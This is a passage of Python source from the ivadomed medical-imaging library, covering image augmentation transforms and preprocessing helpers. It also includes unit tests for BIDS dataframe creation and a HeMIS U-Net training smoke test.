            tuple: (soft mask in [0, 1], binary mask) after dilation.
        """
        # identify each object
        arr_labeled, lb_nb = label(arr.astype(int))
        # loop across each object
        arr_bin_lst, arr_soft_lst = [], []
        for obj_idx in range(1, lb_nb + 1):
            arr_bin_obj = (arr_labeled == obj_idx).astype(int)
            arr_soft_obj = np.copy(arr_bin_obj).astype(float)
            # compute the number of dilation iterations depending on the size of the lesion
            nb_it = int(round(dil_factor * math.sqrt(arr_bin_obj.sum())))
            # values of the voxels added to the input mask
            soft_label_values = [x / (nb_it + 1) for x in range(nb_it, 0, -1)]
            # dilate lesion
            arr_bin_dil, arr_soft_dil = self.dilate_lesion(arr_bin_obj, arr_soft_obj, soft_label_values)
            arr_bin_lst.append(arr_bin_dil)
            arr_soft_lst.append(arr_soft_dil)
        # sum dilated objects
        arr_bin_idx = np.sum(np.array(arr_bin_lst), axis=0)
        arr_soft_idx = np.sum(np.array(arr_soft_lst), axis=0)
        # clip values in case dilated voxels overlap
        arr_bin_clip, arr_soft_clip = np.clip(arr_bin_idx, 0, 1), np.clip(arr_soft_idx, 0.0, 1.0)
        return arr_soft_clip.astype(float), arr_bin_clip.astype(int)

    @staticmethod
    def random_holes(arr_in, arr_soft, arr_bin):
        """Randomly drop a fraction of the voxels added by the dilation."""
        arr_soft_out = np.copy(arr_soft)
        # coordinates of the new voxels, i.e. the ones from the dilation
        new_voxels_xx, new_voxels_yy, new_voxels_zz = np.where(np.logical_xor(arr_bin, arr_in))
        nb_new_voxels = new_voxels_xx.shape[0]
        # ratio of voxels added to the input mask from the dilated mask
        new_voxel_ratio = random.random()
        # randomly select new voxel indexes to remove
        idx_to_remove = random.sample(range(nb_new_voxels),
                                      int(round(nb_new_voxels * (1 - new_voxel_ratio))))
        # set to zero the here-above randomly selected new voxels
        arr_soft_out[new_voxels_xx[idx_to_remove],
                     new_voxels_yy[idx_to_remove],
                     new_voxels_zz[idx_to_remove]] = 0.0
        arr_bin_out = (arr_soft_out > 0).astype(int)
        return arr_soft_out, arr_bin_out

    @staticmethod
    def post_processing(arr_in, arr_soft, arr_bin, arr_dil):
        """Remove dilated objects disconnected from the input and fill holes."""
        # remove new object that are not connected to the input mask
        arr_labeled, lb_nb = label(arr_bin)
        connected_to_in = arr_labeled * arr_in
        for lb in range(1, lb_nb + 1):
            if np.sum(connected_to_in == lb) == 0:
                arr_soft[arr_labeled == lb] = 0
        # 2D data (singleton last axis) gets a flat structuring element
        struct = np.ones((3, 3, 1) if arr_soft.shape[2] == 1 else (3, 3, 3))
        # binary closing
        arr_bin_closed = binary_closing((arr_soft > 0).astype(int), structure=struct)
        # fill binary holes
        arr_bin_filled = binary_fill_holes(arr_bin_closed)
        # recover the soft-value assigned to the filled-holes
        arr_soft_out = arr_bin_filled * arr_dil
        return arr_soft_out

    @multichannel_capable
    @two_dim_compatible
    def __call__(self, sample, metadata=None):
        # binarize for processing
        gt_data_np = (sample > 0.5).astype(int)
        if self.dil_factor > 0 and np.sum(sample):
            # dilation
            gt_dil, gt_dil_bin = self.dilate_arr(gt_data_np, self.dil_factor)
            # random holes in dilated area
            # gt_holes, gt_holes_bin = self.random_holes(gt_data_np, gt_dil, gt_dil_bin)
            # post-processing
            # gt_pp = self.post_processing(gt_data_np, gt_holes, gt_holes_bin, gt_dil)
            # return gt_pp.astype(np.float32), metadata
            return gt_dil.astype(np.float32), metadata
        else:
            return sample, metadata
class BoundingBoxCrop(Crop):
    """Crops image according to given bounding box."""

    @multichannel_capable
    @two_dim_compatible
    def __call__(self, sample, metadata):
        assert 'bounding_box' in metadata
        x_min, x_max, y_min, y_max, z_min, z_max = metadata['bounding_box']
        # Crop window starts at the bounding-box minima; the extent comes from self.size.
        dims = sample.shape
        metadata['crop_params'][self.__class__.__name__] = (x_min, y_min, z_min) + tuple(dims)
        # Call base method
        return super().__call__(sample, metadata)
class RandomAffine(ImedTransform):
    """Apply Random Affine transformation.

    Random rotation, scaling and translation parameters are drawn on the first
    call for a sample and cached in ``metadata`` so associated samples (e.g.
    image and GT) undergo the exact same transformation.

    Args:
        degrees (float): Positive float or list (or tuple) of length two. Angles in degrees. If only a float is
            provided, then rotation angle is selected within the range [-degrees, degrees]. Otherwise, the list / tuple
            defines this range.
        translate (list of float): List of floats between 0 and 1, of length 2 or 3 depending on the sample shape (2D
            or 3D). These floats defines the maximum range of translation along each axis.
        scale (list of float): List of floats between 0 and 1, of length 2 or 3 depending on the sample shape (2D
            or 3D). These floats defines the maximum range of scaling along each axis.

    Attributes:
        degrees (tuple of floats):
        translate (list of float or None):
        scale (list of float):
    """
    def __init__(self, degrees=0, translate=None, scale=None):
        # Rotation
        if isinstance(degrees, numbers.Number):
            if degrees < 0:
                raise ValueError("If degrees is a single number, it must be positive.")
            self.degrees = (-degrees, degrees)
        else:
            assert isinstance(degrees, (tuple, list)) and len(degrees) == 2, \
                "degrees should be a list or tuple and it must be of length 2."
            self.degrees = degrees
        # Scale
        if scale is not None:
            assert isinstance(scale, (tuple, list)) and (len(scale) == 2 or len(scale) == 3), \
                "scale should be a list or tuple and it must be of length 2 or 3."
            for s in scale:
                if not (0.0 <= s <= 1.0):
                    raise ValueError("scale values should be between 0 and 1")
            # BUG FIX: copy before padding so the caller's list is not mutated
            # (and so a tuple argument does not crash on .append).
            scale = list(scale)
            if len(scale) == 2:
                scale.append(0.0)
            self.scale = scale
        else:
            self.scale = [0., 0., 0.]
        # Translation
        if translate is not None:
            assert isinstance(translate, (tuple, list)) and (len(translate) == 2 or len(translate) == 3), \
                "translate should be a list or tuple and it must be of length 2 or 3."
            for t in translate:
                if not (0.0 <= t <= 1.0):
                    raise ValueError("translation values should be between 0 and 1")
            # BUG FIX: copy before padding (see scale above).
            translate = list(translate)
            if len(translate) == 2:
                translate.append(0.0)
        # BUG FIX: always assign the attribute. Previously it was only set when
        # `translate` was not None, so the default construction crashed with an
        # AttributeError on the first __call__.
        self.translate = translate

    @multichannel_capable
    @two_dim_compatible
    def __call__(self, sample, metadata=None):
        # Rotation
        # If angle and metadata have been already defined for this sample, then use them
        if 'rotation' in metadata:
            angle, axes = metadata['rotation']
        # Otherwise, get random ones
        else:
            # Get the random angle
            angle = math.radians(np.random.uniform(self.degrees[0], self.degrees[1]))
            # Get the two axes that define the plane of rotation
            axes = list(random.sample(range(3 if sample.shape[2] > 1 else 2), 2))
            axes.sort()
            # Save params
            metadata['rotation'] = [angle, axes]
        # Scale
        if "scale" in metadata:
            scale_x, scale_y, scale_z = metadata['scale']
        else:
            scale_x = random.uniform(1 - self.scale[0], 1 + self.scale[0])
            scale_y = random.uniform(1 - self.scale[1], 1 + self.scale[1])
            scale_z = random.uniform(1 - self.scale[2], 1 + self.scale[2])
            metadata['scale'] = [scale_x, scale_y, scale_z]
        # Get params
        if 'translation' in metadata:
            translations = metadata['translation']
        else:
            self.data_shape = sample.shape
            if self.translate is not None:
                # Maximum translation is a fraction of the sample extent per axis
                max_dx = self.translate[0] * self.data_shape[0]
                max_dy = self.translate[1] * self.data_shape[1]
                max_dz = self.translate[2] * self.data_shape[2]
                translations = (np.round(np.random.uniform(-max_dx, max_dx)),
                                np.round(np.random.uniform(-max_dy, max_dy)),
                                np.round(np.random.uniform(-max_dz, max_dz)))
            else:
                translations = (0, 0, 0)
            metadata['translation'] = translations
        # Do rotation: build the 3x3 rotation matrix for the selected plane
        shape = 0.5 * np.array(sample.shape)
        if axes == [0, 1]:
            rotate = np.array([[math.cos(angle), -math.sin(angle), 0],
                               [math.sin(angle), math.cos(angle), 0],
                               [0, 0, 1]])
        elif axes == [0, 2]:
            rotate = np.array([[math.cos(angle), 0, math.sin(angle)],
                               [0, 1, 0],
                               [-math.sin(angle), 0, math.cos(angle)]])
        elif axes == [1, 2]:
            rotate = np.array([[1, 0, 0],
                               [0, math.cos(angle), -math.sin(angle)],
                               [0, math.sin(angle), math.cos(angle)]])
        else:
            raise ValueError("Unknown axes value")
        scale = np.array([[1 / scale_x, 0, 0], [0, 1 / scale_y, 0], [0, 0, 1 / scale_z]])
        # The undo path composes the matrices in the opposite order
        if "undo" in metadata and metadata["undo"]:
            transforms = scale.dot(rotate)
        else:
            transforms = rotate.dot(scale)
        # Offset keeps the rotation/scaling centered on the volume center
        offset = shape - shape.dot(transforms) + translations
        data_out = affine_transform(sample, transforms.T, order=1, offset=offset,
                                    output_shape=sample.shape).astype(sample.dtype)
        return data_out, metadata

    @multichannel_capable
    @two_dim_compatible
    def undo_transform(self, sample, metadata=None):
        """Apply the inverse affine transform using the cached parameters."""
        assert "rotation" in metadata
        assert "scale" in metadata
        assert "translation" in metadata
        # Opposite rotation, same axes
        angle, axes = - metadata['rotation'][0], metadata['rotation'][1]
        scale = 1 / np.array(metadata['scale'])
        translation = - np.array(metadata['translation'])
        # Undo rotation and scaling first (translation handled separately below)
        dict_params = {"rotation": [angle, axes], "scale": scale, "translation": [0, 0, 0], "undo": True}
        data_out, _ = self.__call__(sample, dict_params)
        data_out = affine_transform(data_out, np.identity(3), order=1, offset=translation,
                                    output_shape=sample.shape).astype(sample.dtype)
        return data_out, metadata
class RandomReverse(ImedTransform):
    """Make a randomized symmetric inversion of the different values of each dimensions.

    Each axis is flipped independently with probability 0.5; the drawn booleans
    are cached in ``metadata['reverse']`` so associated samples share the flips.
    """

    @multichannel_capable
    @two_dim_compatible
    def __call__(self, sample, metadata=None):
        if 'reverse' in metadata:
            flip_axes = metadata['reverse']
        else:
            # Flip axis booleans
            flip_axes = [np.random.randint(2) == 1 for _ in [0, 1, 2]]
            # Save in metadata
            metadata['reverse'] = flip_axes
        # Run flip
        for idx_axis, flip_bool in enumerate(flip_axes):
            # BUG FIX: the condition previously tested the (always truthy) list
            # `flip_axes` instead of the per-axis boolean, so every axis was
            # flipped regardless of the drawn values.
            if flip_bool:
                sample = np.flip(sample, axis=idx_axis).copy()
        return sample, metadata

    @multichannel_capable
    @two_dim_compatible
    def undo_transform(self, sample, metadata=None):
        """Re-apply the same flips (flipping is an involution) to undo."""
        assert "reverse" in metadata
        return self.__call__(sample, metadata)
class RandomShiftIntensity(ImedTransform):
    """Add a random intensity offset.

    Args:
        shift_range (tuple of floats): Tuple of length two. Specifies the range where the offset that is applied is
            randomly selected from.
        prob (float): Between 0 and 1. Probability of occurence of this transformation.
    """
    def __init__(self, shift_range, prob=0.1):
        self.shift_range = shift_range
        self.prob = prob

    @multichannel_capable
    def __call__(self, sample, metadata=None):
        # Draw an offset with probability self.prob, otherwise leave intensities unchanged.
        if np.random.random() < self.prob:
            offset = np.random.uniform(self.shift_range[0], self.shift_range[1])
        else:
            offset = 0.0
        # Record the offset so the shift can be undone later.
        metadata['offset'] = offset
        shifted = (sample + offset).astype(sample.dtype)
        return shifted, metadata

    @multichannel_capable
    def undo_transform(self, sample, metadata=None):
        assert 'offset' in metadata
        # Remove exactly the offset that was applied.
        restored = (sample - metadata['offset']).astype(sample.dtype)
        return restored, metadata
class ElasticTransform(ImedTransform):
    """Applies elastic transformation.

    .. seealso::
        Simard, <NAME>., <NAME>, and <NAME>. "Best practices for convolutional neural networks
        applied to visual document analysis." Icdar. Vol. 3. No. 2003. 2003.

    Args:
        alpha_range (tuple of floats): Deformation coefficient. Length equals 2.
        sigma_range (tuple of floats): Standard deviation. Length equals 2.
        p (float): Probability of applying the deformation. Default 0.1.
    """
    def __init__(self, alpha_range, sigma_range, p=0.1):
        self.alpha_range = alpha_range
        self.sigma_range = sigma_range
        self.p = p

    @multichannel_capable
    @two_dim_compatible
    def __call__(self, sample, metadata=None):
        # if params already defined, i.e. sample is GT
        if "elastic" in metadata:
            alpha, sigma = metadata["elastic"]
        elif np.random.random() < self.p:
            # Get params
            alpha = np.random.uniform(self.alpha_range[0], self.alpha_range[1])
            sigma = np.random.uniform(self.sigma_range[0], self.sigma_range[1])
            # Save params
            metadata["elastic"] = [alpha, sigma]
        else:
            # [None, None] marks "no deformation for this sample"
            metadata["elastic"] = [None, None]
        # NOTE(review): an alpha drawn exactly 0.0 is also treated as "no
        # deformation" by this truthiness test — confirm acceptable.
        if any(metadata["elastic"]):
            # Get shape
            shape = sample.shape
            # Compute random deformation: smoothed random fields scaled by alpha
            dx = gaussian_filter((np.random.rand(*shape) * 2 - 1),
                                 sigma, mode="constant", cval=0) * alpha
            dy = gaussian_filter((np.random.rand(*shape) * 2 - 1),
                                 sigma, mode="constant", cval=0) * alpha
            dz = gaussian_filter((np.random.rand(*shape) * 2 - 1),
                                 sigma, mode="constant", cval=0) * alpha
            if shape[2] == 1:
                dz = 0  # No deformation along the last dimension
            x, y, z = np.meshgrid(np.arange(shape[0]),
                                  np.arange(shape[1]),
                                  np.arange(shape[2]), indexing='ij')
            indices = np.reshape(x + dx, (-1, 1)), \
                      np.reshape(y + dy, (-1, 1)), \
                      np.reshape(z + dz, (-1, 1))
            # Apply deformation
            data_out = map_coordinates(sample, indices, order=1, mode='reflect')
            # Keep input shape
            data_out = data_out.reshape(shape)
            # Keep data type
            data_out = data_out.astype(sample.dtype)
            return data_out, metadata
        else:
            return sample, metadata
class AdditiveGaussianNoise(ImedTransform):
    """Adds Gaussian Noise to images.

    Args:
        mean (float): Gaussian noise mean.
        std (float): Gaussian noise standard deviation.
    """
    def __init__(self, mean=0.0, std=0.01):
        self.mean = mean
        self.std = std

    @multichannel_capable
    def __call__(self, sample, metadata=None):
        if "gaussian_noise" in metadata:
            noise = metadata["gaussian_noise"]
        else:
            # Get random noise
            noise = np.random.normal(self.mean, self.std, sample.shape)
            noise = noise.astype(np.float32)
            # BUG FIX: cache the drawn noise in the metadata. The lookup above
            # expects it, but it was never stored, so associated samples could
            # never share the same noise realization.
            metadata["gaussian_noise"] = noise
        # Apply noise
        data_out = sample + noise
        return data_out.astype(sample.dtype), metadata
class Clahe(ImedTransform):
    """ Applies Contrast Limited Adaptive Histogram Equalization for enhancing the local image contrast.

    .. seealso::
        <NAME>. "Contrast limited adaptive histogram equalization." Graphics gems (1994): 474-485.

    Default values are based on:

    .. seealso::
        <NAME>, et al. "3-D consistent and robust segmentation of cardiac images by deep learning with spatial
        propagation." IEEE transactions on medical imaging 37.9 (2018): 2137-2148.

    Args:
        clip_limit (float): Clipping limit, normalized between 0 and 1.
        kernel_size (tuple of int): Defines the shape of contextual regions used in the algorithm. Length equals image
            dimension (ie 2 or 3 for 2D or 3D, respectively).
    """
    def __init__(self, clip_limit=3.0, kernel_size=(8, 8)):
        self.clip_limit = clip_limit
        self.kernel_size = kernel_size

    @multichannel_capable
    def __call__(self, sample, metadata=None):
        # One contextual-region size per image dimension is required.
        assert len(self.kernel_size) == len(sample.shape)
        # Run equalization and restore the input dtype.
        equalized = equalize_adapthist(sample,
                                       kernel_size=self.kernel_size,
                                       clip_limit=self.clip_limit)
        return equalized.astype(sample.dtype), metadata
class HistogramClipping(ImedTransform):
    """Performs intensity clipping based on percentiles.

    Args:
        min_percentile (float): Between 0 and 100. Lower clipping limit.
        max_percentile (float): Between 0 and 100. Higher clipping limit.
    """
    def __init__(self, min_percentile=5.0, max_percentile=95.0):
        self.min_percentile = min_percentile
        self.max_percentile = max_percentile

    @multichannel_capable
    def __call__(self, sample, metadata=None):
        # Percentile-based lower/upper bounds estimated from the sample itself.
        low = np.percentile(sample, self.min_percentile)
        high = np.percentile(sample, self.max_percentile)
        # Clip into [low, high] on a copy, leaving the input untouched.
        clipped = np.copy(sample)
        clipped[sample <= low] = low
        clipped[sample >= high] = high
        return clipped, metadata
def get_subdatasets_transforms(transform_params):
    """Get transformation parameters for each subdataset: training, validation and testing.

    A transformation applies to every subdataset unless its parameters contain
    a "dataset_type" list restricting it; that bookkeeping key is stripped from
    the returned dictionaries.

    Args:
        transform_params (dict): Transformation name -> parameters mapping.

    Returns:
        dict, dict, dict: Training, Validation and Testing transformations.
    """
    # Work on a deep copy so the caller's dictionary is left untouched.
    transform_params = copy.deepcopy(transform_params)
    subdatasets = {"training": {}, "validation": {}, "testing": {}}
    for name, params in transform_params.items():
        # By default a transformation applies to every subdataset.
        applies_to = params.get("dataset_type", list(subdatasets))
        for subds_name, subds_dict in subdatasets.items():
            if subds_name in applies_to:
                subds_dict[name] = params
                # "dataset_type" is bookkeeping only: strip it from the output.
                params.pop("dataset_type", None)
    return subdatasets["training"], subdatasets["validation"], subdatasets["testing"]
def get_preprocessing_transforms(transforms):
    """Checks the transformations parameters and selects the transformations which are done during preprocessing only.

    The preprocessing transformations ("Resample", "CenterCrop", "ROICrop") are
    *moved out* of ``transforms``: they are deleted from the input dictionary
    in place (callers rely on this side effect) and returned in a new one.

    Args:
        transforms (dict): Transformation dictionary. Modified in place.

    Returns:
        dict: Preprocessing transforms (deep copies of the removed entries).
    """
    preprocessing_names = ("Resample", "CenterCrop", "ROICrop")
    preprocessing_transforms = {}
    # Iterate over a snapshot of the keys since we delete from `transforms`.
    # (Previously the whole dict was deep-copied twice and iterated with an
    # unused enumerate index; only the moved entries need copying.)
    for name in list(transforms):
        if name in preprocessing_names:
            # Deep copy so later mutation of the returned dict cannot leak back.
            preprocessing_transforms[name] = copy.deepcopy(transforms[name])
            del transforms[name]
    return preprocessing_transforms
def apply_preprocessing_transforms(transforms, seg_pair, roi_pair=None):
    """
    Applies preprocessing transforms to segmentation pair (input, gt and metadata).

    The ROI (if any) is transformed first so that crop parameters it produces
    are propagated to the image metadata, then the image, then the GT.

    Args:
        transforms (Compose): Preprocessing transforms.
        seg_pair (dict): Segmentation pair containing input and gt.
        roi_pair (dict): Segementation pair containing input and roi.

    Returns:
        tuple: Segmentation pair and roi pair.
    """
    if transforms is None:
        return (seg_pair, roi_pair)
    metadata_input = seg_pair['input_metadata']
    if roi_pair is not None:
        stack_roi, metadata_roi = transforms(sample=roi_pair["gt"],
                                             metadata=roi_pair['gt_metadata'],
                                             data_type="roi")
        # Propagate ROI-derived metadata (e.g. crop params) to the input metadata
        metadata_input = imed_loader_utils.update_metadata(metadata_roi, metadata_input)
    # Run transforms on images
    stack_input, metadata_input = transforms(sample=seg_pair["input"],
                                             metadata=metadata_input,
                                             data_type="im")
    # Run transforms on GT, reusing the metadata produced for the images
    metadata_gt = imed_loader_utils.update_metadata(metadata_input, seg_pair['gt_metadata'])
    stack_gt, metadata_gt = transforms(sample=seg_pair["gt"],
                                       metadata=metadata_gt,
                                       data_type="gt")
    seg_pair = {
        'input': stack_input,
        'gt': stack_gt,
        'input_metadata': metadata_input,
        'gt_metadata': metadata_gt
    }
    # Rebuild the roi pair only when an actual ROI mask is present
    if roi_pair is not None and len(roi_pair['gt']):
        roi_pair = {
            'input': stack_input,
            'gt': stack_roi,
            'input_metadata': metadata_input,
            'gt_metadata': metadata_roi
        }
    return (seg_pair, roi_pair)
def prepare_transforms(transform_dict, requires_undo=True):
    """
    Separate the preprocessing transforms from the others and generate the related undo transforms.

    Args:
        transform_dict (dict): Dictionary containing the transforms and their parameters.
        requires_undo (bool): Boolean indicating if transforms can be undone.

    Returns:
        list, UndoCompose: transform list containing the preprocessing transforms and regular transforms, UndoCompose
            object containing the transform to undo.
    """
    # Build the undo pipeline from the full dictionary before it is split.
    training_undo_transform = UndoCompose(Compose(transform_dict.copy())) if requires_undo else None
    # NOTE: this call removes the preprocessing entries from transform_dict in place.
    preprocessing_dict = get_preprocessing_transforms(transform_dict)
    composed_preprocessing = Compose(preprocessing_dict, requires_undo=requires_undo)
    composed_transforms = Compose(transform_dict, requires_undo=requires_undo)
    transform_lst = [composed_preprocessing if preprocessing_dict else None, composed_transforms]
    return transform_lst, training_undo_transform
|
nekohayo/ivadomed | testing/unit_tests/test_loader.py | import os
import pytest
import pandas as pd
import csv_diff
from ivadomed.loader import utils as imed_loader_utils
@pytest.mark.parametrize('loader_parameters', [{
    "bids_path": "testing_data/microscopy_png",
    "bids_config": "ivadomed/config/config_bids.json",
    "target_suffix": [["_seg-myelin-manual", "_seg-axon-manual"]],
    "extensions": [".png"],
    "contrast_params": {
        "training_validation": [],
        "testing": [],
        "balance": {}
    }}])
def test_bids_df_microscopy_png(loader_parameters):
    """Check the BIDS dataframe built for a microscopy PNG dataset.

    Covers _sessions.tsv/_scans.tsv handling, a nested target_suffix list and
    an empty contrast_params configuration. The generated dataframe is
    compared against a reference CSV stored in the test data folder.
    """
    loader_params = loader_parameters
    loader_params["contrast_params"]["contrast_lst"] = loader_params["contrast_params"]["training_validation"]
    bids_path = loader_params["bids_path"]
    derivatives = True
    df_test = imed_loader_utils.create_bids_dataframe(loader_params, derivatives)
    # Paths depend on the local checkout: drop them before comparing.
    df_test = df_test.drop(columns=['path', 'parent_path'])
    df_test = df_test.sort_values(by=['filename']).reset_index(drop=True)
    csv_ref = os.path.join(bids_path, "df_ref.csv")
    csv_test = os.path.join(bids_path, "df_test.csv")
    df_test.to_csv(csv_test, index=False)
    # BUG FIX: close the CSV handles (they were previously leaked via bare open()).
    with open(csv_ref) as f_ref, open(csv_test) as f_tst:
        diff = csv_diff.compare(csv_diff.load_csv(f_ref), csv_diff.load_csv(f_tst))
    assert diff == {'added': [], 'removed': [], 'changed': [], 'columns_added': [], 'columns_removed': []}
@pytest.mark.parametrize('loader_parameters', [{
    "bids_path": "testing_data",
    "target_suffix": ["_seg-manual"],
    "extensions": [],
    "contrast_params": {
        "training_validation": ["T1w", "T2w"],
        "testing": [],
        "balance": {}
    }}])
def test_bids_df_anat(loader_parameters):
    """Check the BIDS dataframe built from an MRI anat nii.gz dataset.

    Covers: no file extensions provided, multiple contrasts, and a flat
    target_suffix list.  The dataframe is written to CSV and diffed against
    df_ref.csv.
    """
    loader_params = loader_parameters
    loader_params["contrast_params"]["contrast_lst"] = loader_params["contrast_params"]["training_validation"]
    bids_path = loader_params["bids_path"]
    derivatives = True
    df_test = imed_loader_utils.create_bids_dataframe(loader_params, derivatives)
    # Drop machine-specific absolute paths before comparing against the reference.
    df_test = df_test.drop(columns=['path', 'parent_path'])
    df_test = df_test.sort_values(by=['filename']).reset_index(drop=True)
    csv_ref = os.path.join(bids_path, "df_ref.csv")
    csv_test = os.path.join(bids_path, "df_test.csv")
    df_test.to_csv(csv_test, index=False)
    # Context managers so both CSV files are closed even if the diff fails
    # (the original leaked two open file handles).
    with open(csv_ref) as ref_file, open(csv_test) as test_file:
        diff = csv_diff.compare(csv_diff.load_csv(ref_file), csv_diff.load_csv(test_file))
    assert diff == {'added': [], 'removed': [], 'changed': [], 'columns_added': [], 'columns_removed': []}
|
nekohayo/ivadomed | testing/unit_tests/test_HeMIS.py | <filename>testing/unit_tests/test_HeMIS.py
import os
import time
import pytest
import numpy as np
import torch
import torch.backends.cudnn as cudnn
from torch import optim
from torch.utils.data import DataLoader
from tqdm import tqdm
import ivadomed.transforms as imed_transforms
from ivadomed import losses
from ivadomed import models
from ivadomed import utils as imed_utils
from ivadomed.loader import utils as imed_loader_utils, adaptative as imed_adaptative
from ivadomed import training as imed_training
# Global knobs for the HeMIS smoke test below.
cudnn.benchmark = True  # let cuDNN autotune conv algorithms (input shapes are fixed)
GPU_NUMBER = 0  # CUDA device index used when a GPU is available
BATCH_SIZE = 4
DROPOUT = 0.4  # drop rate passed to HeMISUnet
BN = 0.1  # batch-norm momentum passed to HeMISUnet
N_EPOCHS = 10
INIT_LR = 0.01  # initial Adam learning rate
PATH_BIDS = 'testing_data'
p = 0.0001  # initial modality-drop probability (shadowed by test_HeMIS's own parameter)
@pytest.mark.run(order=1)
def test_HeMIS(p=0.0001):
    """End-to-end training smoke test for the HeMIS U-Net on an HDF5 dataset.

    Builds an HDF5Dataset from `testing_data`, trains for N_EPOCHS, and after
    each epoch grows the modality-availability probability ``p`` via
    ``p ** (2/3)`` (tends toward 1) before rebuilding the DataLoader.  Timing
    statistics for every stage of the loop are printed at the end.  The HDF5
    file it creates is consumed (and deleted) by test_hdf5_bids below.
    """
    print('[INFO]: Starting test ... \n')
    training_transform_dict = {
        "Resample":
            {
                "wspace": 0.75,
                "hspace": 0.75
            },
        "CenterCrop":
            {
                "size": [48, 48]
            },
        "NumpyToTensor": {}
    }
    transform_lst, _ = imed_transforms.prepare_transforms(training_transform_dict)
    roi_params = {"suffix": "_seg-manual", "slice_filter_roi": None}
    train_lst = ['sub-unf01']
    contrasts = ['T1w', 'T2w', 'T2star']
    print('[INFO]: Creating dataset ...\n')
    model_params = {
        "name": "HeMISUnet",
        "dropout_rate": 0.3,
        "bn_momentum": 0.9,
        "depth": 2,
        "in_channel": 1,
        "out_channel": 1,
        "missing_probability": 0.00001,
        "missing_probability_growth": 0.9,
        "contrasts": ["T1w", "T2w"],
        "ram": False,
        "path_hdf5": 'testing_data/mytestfile.hdf5',
        "csv_path": 'testing_data/hdf5.csv',
        "target_lst": ["T2w"],
        "roi_lst": ["T2w"]
    }
    contrast_params = {
        "contrast_lst": ['T1w', 'T2w', 'T2star'],
        "balance": {}
    }
    dataset = imed_adaptative.HDF5Dataset(root_dir=PATH_BIDS,
                                          subject_lst=train_lst,
                                          model_params=model_params,
                                          contrast_params=contrast_params,
                                          target_suffix=["_lesion-manual"],
                                          slice_axis=2,
                                          transform=transform_lst,
                                          metadata_choice=False,
                                          dim=2,
                                          slice_filter_fn=imed_loader_utils.SliceFilter(filter_empty_input=True,
                                                                                        filter_empty_mask=True),
                                          roi_params=roi_params)
    dataset.load_into_ram(['T1w', 'T2w', 'T2star'])
    print("[INFO]: Dataset RAM status:")
    print(dataset.status)
    print("[INFO]: In memory Dataframe:")
    print(dataset.dataframe)
    # TODO
    # ds_train.filter_roi(nb_nonzero_thr=10)
    train_loader = DataLoader(dataset, batch_size=BATCH_SIZE,
                              shuffle=True, pin_memory=True,
                              collate_fn=imed_loader_utils.imed_collate,
                              num_workers=1)
    model = models.HeMISUnet(contrasts=contrasts,
                             depth=3,
                             drop_rate=DROPOUT,
                             bn_momentum=BN)
    print(model)
    cuda_available = torch.cuda.is_available()
    if cuda_available:
        torch.cuda.set_device(GPU_NUMBER)
        print("Using GPU number {}".format(GPU_NUMBER))
        model.cuda()
    # Initialing Optimizer and scheduler
    step_scheduler_batch = False
    optimizer = optim.Adam(model.parameters(), lr=INIT_LR)
    scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, N_EPOCHS)
    # Per-stage timing accumulators: data load, dataset reload, forward,
    # backward/step, batch generation, per-epoch init, scheduler step.
    load_lst, reload_lst, pred_lst, opt_lst, schedul_lst, init_lst, gen_lst = [], [], [], [], [], [], []
    for epoch in tqdm(range(1, N_EPOCHS + 1), desc="Training"):
        start_time = time.time()
        start_init = time.time()
        lr = scheduler.get_last_lr()[0]
        model.train()
        tot_init = time.time() - start_init
        init_lst.append(tot_init)
        num_steps = 0
        start_gen = 0
        for i, batch in enumerate(train_loader):
            # start_gen is set at the end of the previous iteration, so the
            # generation time of the very first batch is intentionally skipped.
            if i > 0:
                tot_gen = time.time() - start_gen
                gen_lst.append(tot_gen)
            start_load = time.time()
            input_samples, gt_samples = imed_utils.unstack_tensors(batch["input"]), batch["gt"]
            print(batch["input_metadata"][0][0]["missing_mod"])
            missing_mod = imed_training.get_metadata(batch["input_metadata"], model_params)
            print("Number of missing contrasts = {}."
                  .format(len(input_samples) * len(input_samples[0]) - missing_mod.sum()))
            print("len input = {}".format(len(input_samples)))
            print("Batch = {}, {}".format(input_samples[0].shape, gt_samples[0].shape))
            if cuda_available:
                var_input = imed_utils.cuda(input_samples)
                var_gt = imed_utils.cuda(gt_samples, non_blocking=True)
            else:
                var_input = input_samples
                var_gt = gt_samples
            tot_load = time.time() - start_load
            load_lst.append(tot_load)
            start_pred = time.time()
            preds = model(var_input, missing_mod)
            tot_pred = time.time() - start_pred
            pred_lst.append(tot_pred)
            start_opt = time.time()
            # NOTE(review): negation suggests losses.DiceLoss returns a score
            # to maximize rather than a loss -- confirm against its definition.
            loss = - losses.DiceLoss()(preds, var_gt)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            if step_scheduler_batch:
                scheduler.step()
            num_steps += 1
            tot_opt = time.time() - start_opt
            opt_lst.append(tot_opt)
            start_gen = time.time()
        start_schedul = time.time()
        if not step_scheduler_batch:
            scheduler.step()
        tot_schedul = time.time() - start_schedul
        schedul_lst.append(tot_schedul)
        start_reload = time.time()
        print("[INFO]: Updating Dataset")
        p = p ** (2 / 3)
        dataset.update(p=p)
        print("[INFO]: Reloading dataset")
        train_loader = DataLoader(dataset, batch_size=BATCH_SIZE,
                                  shuffle=True, pin_memory=True,
                                  collate_fn=imed_loader_utils.imed_collate,
                                  num_workers=1)
        tot_reload = time.time() - start_reload
        reload_lst.append(tot_reload)
        end_time = time.time()
        total_time = end_time - start_time
        tqdm.write("Epoch {} took {:.2f} seconds.".format(epoch, total_time))
    print('Mean SD init {} -- {}'.format(np.mean(init_lst), np.std(init_lst)))
    print('Mean SD load {} -- {}'.format(np.mean(load_lst), np.std(load_lst)))
    print('Mean SD reload {} -- {}'.format(np.mean(reload_lst), np.std(reload_lst)))
    print('Mean SD pred {} -- {}'.format(np.mean(pred_lst), np.std(pred_lst)))
    print('Mean SD opt {} -- {}'.format(np.mean(opt_lst), np.std(opt_lst)))
    print('Mean SD gen {} -- {}'.format(np.mean(gen_lst), np.std(gen_lst)))
    print('Mean SD scheduler {} -- {}'.format(np.mean(schedul_lst), np.std(schedul_lst)))
@pytest.mark.run(order=2)
def test_hdf5_bids():
    """Convert the HDF5 file written by test_HeMIS back to a BIDS tree, then clean up."""
    hdf5_path = 'testing_data/mytestfile.hdf5'
    out_dir = "test_adap_bids"
    os.makedirs(out_dir)
    imed_adaptative.HDF5ToBIDS(hdf5_path, ['sub-unf01'], out_dir)
    expected = ("test_adap_bids/sub-unf01/anat",
                "test_adap_bids/derivatives/labels/sub-unf01/anat")
    for directory in expected:
        assert os.path.isdir(directory)
    # once done we can delete the file
